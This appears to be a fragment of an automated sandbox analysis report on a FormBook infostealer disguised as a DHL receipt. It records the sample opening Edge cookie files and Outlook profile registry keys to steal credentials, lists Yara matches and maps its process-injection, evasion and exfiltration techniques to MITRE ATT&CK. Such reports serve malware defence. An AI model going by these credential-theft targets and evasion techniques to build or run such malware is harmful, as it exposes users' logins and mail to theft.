Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3759977939.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3760294780.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506080108.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3762178583.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3758608396.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509448492.0000000002100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1505225494.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3760130827.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe